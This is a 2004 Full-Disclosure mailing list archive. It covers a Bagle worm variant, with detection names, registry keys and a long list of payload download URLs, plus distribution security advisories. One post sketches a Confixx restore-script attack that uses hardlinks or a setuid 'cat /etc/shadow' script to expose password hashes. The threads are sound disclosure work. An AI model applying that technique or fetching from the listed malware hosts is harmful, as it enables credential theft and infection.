Discovery Date : 8/10/2004 (PHL) Origin : USA Description ( updated : 8/9/2004 11:03:26 AM ) There are reports now in the USA of a malware spreading via email. The file, price.exe, is spread as a ZIP file, and is included in a supposedly manually-spammed email. This price.exe file is a downloader and attempts to download a file named 2.jpg from different sites. The sites are currently inaccessible at the time of this writing. Infected customers also report a file named as windll.exe running in the system. TrendLabs is still currently analyzing the files and will soon post a more detailed analysis. EPS Deliverables Pattern OPR 953 for WORM_BAGLE.AC - Pattern under QA Testing 8/9/2004 11:23:44 AM Thank you, Fooks, LynnBart Lansing Manager, Desktop Services Kohl's IT 262-703-2911 [EMAIL PROTECTED] wrote on 08/09/2004 02:03:54 PM: (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [ GLSA 200408-06 ] SpamAssassin: Denial of Service vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200408-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: SpamAssassin: Denial of Service vulnerability Date: August 09, 2004 Bugs: #59483 ID: 200408-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis SpamAssassin is vulnerable to a Denial of Service attack when handling certain malformed messages. Background == SpamAssassin is an extensible email filter which is used to identify spam. Affected packages = --- Package / Vulnerable / Unaffected --- 1 mail-filter/spamassassin = 2.63-r1 = 2.64 Description === SpamAssassin contains an unspecified Denial of Service vulnerability. Impact == By sending a specially crafted message an attacker could cause a Denial of Service attack against the SpamAssassin service. Workaround == There is no known workaround at this time. All users are encouraged to upgrade to the latest available version of SpamAssassin. Resolution == All SpamAssassin users should upgrade to the latest version: # emerge sync # emerge -pv =mail-filter/spamassassin-2.64 # emerge =mail-filter/spamassassin-2.64 References == [ 1 ] SpamAssassin Release Announcement http://marc.theaimsgroup.com/?l=spamassassin-announcem=109168121628767w=2 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200408-06.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2004 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/1.0 -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFBF9N1zKC5hMHO6rkRAjo2AJ9xHeR8k8af8/7TZAIGWepDzOUkLACfSutp bq76MNaf0/5m8TfAiyfe5IY= =ZqtN -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
Kaspersky detect it as I-Worm.Bagle.al Todd Towles wrote: I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB) There appears to be some people on FD that are infected and we are getting a lot on my end. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 2:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
On Mon, August 9, 2004 12:03 pm, Jonathan Grotegut said: (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? I've seen several dozen of them today... getting pretty annoying. No other info, though. :| -Eric -- arctic bears - email and dns services http://www.arcticbears.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
F-Secure is reporting it as bangle.al. Looks like it's your basic email virus with a trojan backdoor. http://www.f-secure.com/v-descs/bagle_al.shtml Dave King, http://www.thesecure.net Jonathan Grotegut wrote: (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
Todd, Thanks for the reply it appears to be a new beagle variant. http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_BAG LE.AC Jonathan Grotegut -Original Message- From: Todd Towles [mailto:[EMAIL PROTECTED] Sent: Monday, August 09, 2004 1:32 PM To: Jonathan Grotegut; 'Full-disclosure' Subject: RE: [Full-Disclosure] (no subject) I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB) There appears to be some people on FD that are infected and we are getting a lot on my end. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 2:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
this Symantec Rapid Release beta will catch it for NAV users, until they roll-out the next official .def file: ftp://ftp.symantec.com/public/english_us_canada/antivirus_definitions/norton_antivirus/beta/symcbetadefsx86.exe On Mon, 9 Aug 2004 14:32:14 -0500, Todd Towles [EMAIL PROTECTED] wrote: I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB) There appears to be some people on FD that are infected and we are getting a lot on my end. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 2:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- -Micheal ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
ClamAV calls it Trojan.JS.Runme. My update for it came at 3 PM EDT today. From ClamAV Update list: Submission: 5025-web, 5026-web, 5027-web, 5028-web, 5029-web, 5030-web, 5043-web, 5044-web, 5045-web, 5046-web, 5047-web, 5048-web Sender: James Stevens, Bill Landry, Henning Spjelkavik, Melanie Dussiaume, Roman Scheucher, Gunter Mintzel, Mike Watterson, Martin, Rob Kudyba, wojciech myszka, Philip Corliss, Kevin Way Virus: unknown, JS/IllWill (McAfee), JS.Dword.dropper (Bitdefender), JScript/IE.VM.Exploit (Inoculate) Alias: TR/RunMe.Dldr.1 (Hbedv) Added: Trojan.JS.RunMe Added: Trojan.RunMe Note: The name may change. Note: There are more submissions with this; at the moment I'm publishing just some of them. -Mike Jonathan Grotegut wrote: (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject) spoofed addresses still confuse many...
I doubt many are infected on the list. Spoofed addresses culled from eiither the list itself, or via google searches seems to apply here. I've seen at least 4-5 of these yuuckies purporting to come from me and this server here, but, note, it is a solaris server, and I'm doing e-mails here via pine, so those were spoofed. Thanks, Ron DuFresne On Mon, 9 Aug 2004, Todd Towles wrote: I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB) There appears to be some people on FD that are infected and we are getting a lot on my end. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 2:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ~~ Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation. -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
I started seeing this earlier. No news from Norton that I can see. I'm trying to figure out what it does... Shannon Johnston On Mon, 2004-08-09 at 13:03, Jonathan Grotegut wrote: (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- Shannon Johnston [EMAIL PROTECTED] Cavion Plus signature.asc Description: This is a digitally signed message part
Re: [Full-Disclosure] (no subject)
List of URLs embedded within a price.exe i recieved. -M. http://polobeer.de/2.jpg http://r2626r.de/2.jpg http://kooltokyo.ru/2.jpg http://mmag.ru/2.jpg http://advm1.gm.fh-koeln.de/2.jpg http://evadia.ru/2.jpg http://megion.ru/2.jpg http://molinero-berlin.de/2.jpg http://dozenten.f1.fhtw-berlin.de/2.jpg http://shadkhan.ru/2.jpg http://sacred.ru/2.jpg http://kypexin.ru/2.jpg http://www.gantke-net.com/2.jpg http://www.mcschnaeppchen.com/2.jpg http://www.rollenspielzirkel.de/2.jpg http://134.102.228.45/2.jpg http://196.12.49.27/2.jpg http://aus-Zeit.com/2.jpg http://lottery.h11.ru/2.jpg http://herzog.cs.uni-magdeburg.de/2.jpg http://yaguark.h10.ru/2.jpg http://213.188.129.72/2.jpg http://thorpedo.us/2.jpg http://szm.sk/2.jpg http://lars-s.privat.t-online.de/2.jpg http://www.no-abi2003.de/2.jpg http://www.mdmedia.org/2.jpg http://abi-2004.org/2.jpg http://sovea.de/2.jpg http://www.porta.de/2.jpg http://matzlinger.com/2.jpg http://pocono.ru/2.jpg http://controltechniques.ru/2.jpg http://alexey.pioneers.com.ru/2.jpg http://momentum.ru/2.jpg http://omegat.ru/2.jpg http://www.perfectgirls.net/2.jpg http://porno-mania.net/2.jpg http://colleen.ai.net/2.jpg http://ourcj.com/2.jpg http://free.bestialityhost.com/2.jpg http://slavarik.ru/2.jpg http://burn2k.ipupdater.com/2.jpg http://carabi.ru/2.jpg http://spbbook.ru/2.jpg http://binn.ru/2.jpg http://sbuilder.ru/2.jpg http://protek.ru/2.jpg http://www.PlayGround.ru/2.jpg http://celine.artics.ru/2.jpg http://www.artics.ru/2.jpg http://www.laserbuild.ru/2.jpg http://www.lamatec.com/2.jpg http://www.sensi.com/2.jpg http://www.oldtownradio.com/2.jpg http://www.youbuynow.com/2.jpg http://64.62.172.118/2.jpg http://www.tayles.com/2.jpg http://dodgetheatre.com/2.jpg http://www.thepositivesideofsports.com/2.jpg http://www.bridesinrussia.com/2.jpg http://fairy.dataforce.net/2.jpg http://www.pakwerk.ru/2.jpg http://home.profootball.ru/2.jpg http://www.ankil.ru/2.jpg http://www.ddosers.net/2.jpg http://tarkosale.net/2.jpg http://www.boglen.com/2.jpg http://change.east.ru/2.jpg http://www.teatr-estrada.ru/2.jpg http://www.glass-master.ru/2.jpg http://www.zeiss.ru/2.jpg http://www.sposob.ru/2.jpg http://www.glavriba.ru/2.jpg http://alfinternational.ru/2.jpg http://euroviolence.com/2.jpg http://www.webronet.com/2.jpg http://www.virtmemb.com/2.jpg http://www.infognt.com/2.jpg http://www.vivamedia.ru/2.jpg http://www.zelnet.ru/2.jpg http://www.dsmedia.ru/2.jpg http://www.vendex.ru/2.jpg http://www.elit-line.ru/2.jpg http://pixel.co.il/2.jpg http://www.milm.ru/2.jpg http://dev.tikls.net/2.jpg http://www.met.pl/2.jpg http://www.strefa.pl/2.jpg http://kafka.punkt.pl/2.jpg http://www.rubikon.pl/2.jpg http://www.neostrada.pl/2.jpg http://werel1.web-gratis.net/2.jpg http://www.tuhart.net/2.jpg http://www.antykoncepcja.net/2.jpg http://www.dami.com.pl/2.jpg http://vip.pnet.pl/2.jpg http://www.webzdarma.cz/2.jpg http://emnesty.w.interia.pl/2.jpg http://niebo.net/2.jpg http://strony.wp.pl/2.jpg http://sec.polbox.pl/2.jpg http://www.phg.pl/2.jpg http://emnezz.e-mania.pl/2.jpg http://www.republika.pl/2.jpg http://www.silesianet.pl/2.jpg http://www.republika.pl/2.jpg http://tdi-router.opola.pl/2.jpg http://republika.pl/2.jpg http://infokom.pl/2.jpg http://silesianet.pl/2.jpg http://terramail.pl/2.jpg http://silesianet.pl/2.jpg http://www.iluminati.kicks-ass.net/2.jpg http://www.dilver.ru/2.jpg http://www.yarcity.ru/2.jpg http://www.scli.ru/2.jpg http://www.elemental.ru/2.jpg http://diablo.homelinux.com/2.jpg http://www.interrybflot.ru/2.jpg http://www.webpark.pl/2.jpg http://www.rafani.cz/2.jpg http://gutemine.wu-wien.ac.at/2.jpg http://przeglad-tygodnik.pl/2.jpg http://przeglad-tygodnik.pl/2.jpg http://pb195.slupsk.sdi.tpnet.pl/2.jpg http://www.ciachoo.pl/2.jpg http://cavalierland.5u.com/2.jpg http://www.nefkom.net/2.jpg http://rausis.latnet.lv/2.jpg http://www.hgr.de/2.jpg http://www.airnav.com/2.jpg http://www.astoria-stuttgart.de/2.jpg http://ultimate-best-hgh.0my.net/2.jpg http://wynnsjammer.proboards18.com/2.jpg http://www.jewishgen.org/2.jpg http://www.hack-gegen-rechts.com/2.jpg http://host.wallstreetcity.com/2.jpg http://quotes.barchart.com/2.jpg http://www.aannemers-nederland.nl/2.jpg http://www.sjgreatdeals.com/2.jpg http://financial.washingtonpost.com/2.jpg http://www.biratnagarmun.org.np/2.jpg http://hsr.zhp.org.pl/2.jpg http://traveldeals.sidestep.com/2.jpg http://www.hbz-nrw.de/2.jpg http://www.ifa-guide.co.uk/2.jpg http://www.inversorlatino.com/2.jpg http://www.zhp.gdynia.pl/2.jpg http://host.businessweek.com/2.jpg http://packages.debian.or.jp/2.jpg http://www.math.kobe-u.ac.jp/2.jpg http://www.k2kapital.com/2.jpg http://www.tanzen-in-sh.de/2.jpg http://www.wapf.com/2.jpg http://www.hgrstrailer.com/2.jpg http://www.forbes.com/2.jpg http://www.oshweb.com/2.jpg http://www.rumbgeo.ru/2.jpg http://www.dicto.ru/2.jpg http://www.busheron.ru/2.jpg http://www.omnicom.ru/2.jpg http://www.teleline.ru/2.jpg http://www.dynex.ru/2.jpg http://www.gamma.vyborg.ru/2.jpg
RE: [Full-Disclosure] (no subject)
It appears to be what TrendMico calls Beagle.AC - IDE released at 2:30pm Maybe it is dropping a older Trojan. -Original Message- From: Paul Szabo [mailto:[EMAIL PROTECTED] Sent: Monday, August 09, 2004 3:06 PM To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] (no subject) Anyone have any idea what this is ... F-PROT ANTIVIRUS Program version: 4.4.2 Engine version: 3.14.11 VIRUS SIGNATURE FILES SIGN.DEF created 9 August 2004 SIGN2.DEF created 9 August 2004 MACRO.DEF created 10 May 2004 message-new__price.zip-price.html Infection: HTML/[EMAIL PROTECTED] message-new__price.zip-price/price.exe is a dropper for W32/Mitglieder.W Cheers, Paul Szabo - [EMAIL PROTECTED] http://www.maths.usyd.edu.au:8000/u/psz/ School of Mathematics and Statistics University of Sydney 2006 Australia ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
Symantec identifies this as [EMAIL PROTECTED] -Bob Kehr Jonathan Grotegut wrote: (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Michael Sent: Monday, August 09, 2004 3:25 PM To: Jonathan Grotegut Cc: Full-disclosure Subject: Re: [Full-Disclosure] (no subject) List of URLs embedded within a price.exe i recieved. -M. snip All of this is located on the SANS Internet Storm Center site. Bernard linked to it in his response. http://www.incidents.org ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject) spoofed addresses still confuse many...
Well, that is what I meant. People that have people from FD are infected. Sorry typed that up fast when I was working on something else. -Original Message- From: Ron DuFresne [mailto:[EMAIL PROTECTED] Sent: Monday, August 09, 2004 3:40 PM To: Todd Towles Cc: 'Jonathan Grotegut'; 'Full-disclosure' Subject: RE: [Full-Disclosure] (no subject) spoofed addresses still confuse many... I doubt many are infected on the list. Spoofed addresses culled from eiither the list itself, or via google searches seems to apply here. I've seen at least 4-5 of these yuuckies purporting to come from me and this server here, but, note, it is a solaris server, and I'm doing e-mails here via pine, so those were spoofed. Thanks, Ron DuFresne On Mon, 9 Aug 2004, Todd Towles wrote: I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB) There appears to be some people on FD that are infected and we are getting a lot on my end. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 2:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ~~ Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation. -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] New Bagle variant
The worm itself is packed with PeX, uses its own SMTP engine and contains a Mitglieder-like downloader. It also opens a backdoor using TCP and UDP port 2480 on the compromised machine. The virus will transmit over SMTP, P2P and SMB. The following reg keys will be present: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\win_upd2. exe = %System%\WINdirect.exe HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\erthgdr = %System%\windll.exe HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ru1n The zip file contains non-functional code to password protect the zip. It will attempt to send itself to email addresses it gathers from the system from files with the following extensions on the compromised system: .adb .asp .cfg .cgi .dbx .dhtm .eml .htm .jsp .mbx .mdx .mht .mmf .msg .nch .ods .oft .php .pl .sht .shtm .stm .tbb .txt .uin .wab .wsh .xls .xml -- Tremaine IT Security Consultant ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #1825 - 31 msgs
English*** You have send a E-mail to [EMAIL PROTECTED] This E-mail address is no longer in use. Please delete the adress from your addressbook! / Patrik *Swedish*** Du har sänt ett mail till [EMAIL PROTECTED] Denna adress används ej längre. Var vänlig och radera adressen ur din adressbok / Patrik Best reg. Patrik Torin E-mail. [EMAIL PROTECTED] Website. http://www.geocities.com/ptorin/
[Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #1825 - 31 msgs
English*** You have send a E-mail to [EMAIL PROTECTED] This E-mail address is no longer in use. Please delete the adress from your addressbook! / Patrik *Swedish*** Du har sänt ett mail till [EMAIL PROTECTED] Denna adress används ej längre. Var vänlig och radera adressen ur din adressbok / Patrik Best reg. Patrik Torin E-mail. [EMAIL PROTECTED] Website. http://www.geocities.com/ptorin/
Re: [Full-Disclosure] (no subject)
On Mon, 09 Aug 2004 16:07:02 -0400 Michael Erdely [EMAIL PROTECTED] wrote: ClamAV calls it Trojan.JS.Runme. My update for it came at 3 PM EDT today. .. -Mike ClamAV has problems to filter the HTML-e-Mails. I received about 4 infected mails even clamscan/clamD know the virii. ClamScan identify the virii if I scan the atachement saved at the HDD without problems... vh pgpMgM6O7ZChW.pgp Description: PGP signature
Re: [Full-Disclosure] (no subject)
On Mon, 2004-08-09 at 14:43, Bernardo Quintero wrote: BitDefender 7.0/20040809 found [JS.Dword.dropper] ClamWin devel-20040727/20040809 found [Trojan.JS.RunMe] eTrustAV-Inoc 4641/20040728 found [JScript/IE.VM.Exploit] F-Prot 3.15/20040809 found [HTML/[EMAIL PROTECTED] Kaspersky 4.0.2.23/20040809 found nothing McAfee 4383/20040804 found [JS/IllWill] NOD32v2 1.836/20040809 found [Win32/Bagle.AI] Norman 5.70.10/20040806 found [W32/Malware] Panda 7.02.00/20040809 found [Fichero Sospechoso] Sybari 7.5.1314/20040809 found [JS/IllWill] Symantec 8.0/20040809 found nothing TrendMicro 7.000/20040809 found [HTML_BAGLE.AC] Isn't the complete lack of naming standardization in the AV industry simply amazing? Imagine that were the case in science, particular medicine... Makes for a nice game of AV bingo though... -Frank signature.asc Description: This is a digitally signed message part
Re: [Full-Disclosure] waa waa (was Finally the truth slips out)
Security List wrote: Appointed? If you do not believe in the U.S. constitution and the supreme court then I could see how one might suggest that Mr. Bush was appointed. If you do believe in it then you must know that his appointment was the only legal solution to the issue. Many major papers investigated the vote counting in FL and they all concluded that Mr. Bush did win if the votes were counted correctly. Never mind the thousands of military votes the Dems had thrown out which were legal. Come on people. Do your research if you are going to try and make a point. To bring this back to a security issue, your statement hinges on your operational definition of counted correctly. I can guarantee you that many informed people are going to disagree with your personal operational definition of counted correctly. So, the key here is what is the baseline for counting and verifying votes? This is the single largest issue with touch-screen voting and the security of modern elections: verifying the integrity and authenticity of the vote. Many of the so-called legal military votes were given the soldiers already filled out. Some (a significant portion) did not have the valid authentication requirements (SSN, full name, etc). Some soldiers reported that absentee ballots were never actually sent by them, but rather filled out by commanders and sent unsigned. The litmus test for verification is always the completion of the shared secret, whatever form that takes. A properly functional login system doesn't say well, the person may not have put in their password, but I'll let them in anyway!. That's a sign of a flawed system. And if this were not a controversial subject that most people can't seperate emotion fromn logic on, you'd agree with me on this. There are terrible flaws in the electoral system and these issues have to be validly addressed. These issues will continue to shed doubt on elections, regardless of the outcome. -Barry ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Security hole in Confixx backup script
What if someone creates a shell script that simply cat /etc/shadow and sets the SetUID flag. Then he makes a backup of that file and restores the backup while he prevents the chown-command anyhow. All files will remain root. Including the script. The execution of this script will print out the shadowed encrypted passwords. This can even be used to chmod the shadow file and make it readable for everyone On Monday 09 August 2004 19:17, Dirk Pirschel wrote: Hi, * Dirk Pirschel wrote on Mon, 02 Aug 2004 at 13:00 +0200: A user might use the restore funktion to change the ownership of target files to his own. The restore script runs with root privileges. It unpacks the archive, and then executes chown -R $user in the destination directory ($HOME/html or $HOME/files). Before running the restore script, an attacker can make hardlinks to files not owned by himself. The ownership of these files will be changed. On some badly administered systems there is only one disk partion, so it is possible to make a hardlink to /etc/shdadow within $HOME. -Dirk ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] MDKSA-2004:080 - Updated shorewall packages fix temporary file vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandrakelinux Security Update Advisory ___ Package name: shorewall Advisory ID:MDKSA-2004:080 Date: August 9th, 2004 Affected versions: 10.0, 9.1, 9.2, Corporate Server 2.1, Multi Network Firewall 8.2 __ Problem Description: The shorewall package has a vulnerability when creating temporary files and directories, which could allow non-root users to overwrite arbitrary files on the system. The updated packages are patched to fix the problem. As well, for Mandrakelinux 10.0, the updated packages have been fixed to start shorewall after the network, rather than before. After updating the package, if shorewall was previously running, you may need to issue a service shorewall restart. ___ References: http://lists.shorewall.net/pipermail/shorewall-announce/2004-June/000385.html __ Updated Packages: Mandrakelinux 10.0: 96c4da139879d4aae95561643903e352 10.0/RPMS/shorewall-2.0.1-3.2.100mdk.noarch.rpm 1c883024ba09642b4bc32504782dade4 10.0/RPMS/shorewall-doc-2.0.1-3.2.100mdk.noarch.rpm e4f8f24740148c170fefad97c10239de 10.0/SRPMS/shorewall-2.0.1-3.2.100mdk.src.rpm Mandrakelinux 10.0/AMD64: 96c4da139879d4aae95561643903e352 amd64/10.0/RPMS/shorewall-2.0.1-3.2.100mdk.noarch.rpm 1c883024ba09642b4bc32504782dade4 amd64/10.0/RPMS/shorewall-doc-2.0.1-3.2.100mdk.noarch.rpm e4f8f24740148c170fefad97c10239de amd64/10.0/SRPMS/shorewall-2.0.1-3.2.100mdk.src.rpm Corporate Server 2.1: e2ac99cdb648c3b2cfa371c8d8f86c27 corporate/2.1/RPMS/shorewall-1.3.7c-1.1.C21mdk.noarch.rpm 5c913cbdd7edec851003d0ac4de6c1cb corporate/2.1/RPMS/shorewall-doc-1.3.7c-1.1.C21mdk.noarch.rpm df9b686dc83b736e4a2b858290a11b2b corporate/2.1/SRPMS/shorewall-1.3.7c-1.1.C21mdk.src.rpm Corporate Server 2.1/x86_64: e2ac99cdb648c3b2cfa371c8d8f86c27 x86_64/corporate/2.1/RPMS/shorewall-1.3.7c-1.1.C21mdk.noarch.rpm 5c913cbdd7edec851003d0ac4de6c1cb x86_64/corporate/2.1/RPMS/shorewall-doc-1.3.7c-1.1.C21mdk.noarch.rpm df9b686dc83b736e4a2b858290a11b2b x86_64/corporate/2.1/SRPMS/shorewall-1.3.7c-1.1.C21mdk.src.rpm Mandrakelinux 9.1: bf683f629f2ae25d9bb2bc30d162415c 9.1/RPMS/shorewall-1.3.14-3.1.91mdk.noarch.rpm b39b2f3ba5eb851556e4105c7accbf43 9.1/RPMS/shorewall-doc-1.3.14-3.1.91mdk.noarch.rpm b45b025c98066c62fd2b4278f2dc9062 9.1/SRPMS/shorewall-1.3.14-3.1.91mdk.src.rpm Mandrakelinux 9.1/PPC: bf683f629f2ae25d9bb2bc30d162415c ppc/9.1/RPMS/shorewall-1.3.14-3.1.91mdk.noarch.rpm b39b2f3ba5eb851556e4105c7accbf43 ppc/9.1/RPMS/shorewall-doc-1.3.14-3.1.91mdk.noarch.rpm b45b025c98066c62fd2b4278f2dc9062 ppc/9.1/SRPMS/shorewall-1.3.14-3.1.91mdk.src.rpm Mandrakelinux 9.2: 98bf1313a5a801d61701b191418e9ba6 9.2/RPMS/shorewall-1.4.8-2.2.92mdk.noarch.rpm bc20ced6f86f69eb2eb18af32bdc7ff4 9.2/RPMS/shorewall-doc-1.4.8-2.2.92mdk.noarch.rpm 13dbb927824a915fca48448b0d155220 9.2/SRPMS/shorewall-1.4.8-2.2.92mdk.src.rpm Mandrakelinux 9.2/AMD64: 98bf1313a5a801d61701b191418e9ba6 amd64/9.2/RPMS/shorewall-1.4.8-2.2.92mdk.noarch.rpm bc20ced6f86f69eb2eb18af32bdc7ff4 amd64/9.2/RPMS/shorewall-doc-1.4.8-2.2.92mdk.noarch.rpm 13dbb927824a915fca48448b0d155220 amd64/9.2/SRPMS/shorewall-1.4.8-2.2.92mdk.src.rpm Multi Network Firewall 8.2: 547d4b1f55485e49b4afcb03efab433c mnf8.2/RPMS/shorewall-1.3.11-1.2.M82mdk.noarch.rpm 52fa078e31b2f128aedf7bbebe4b25bc 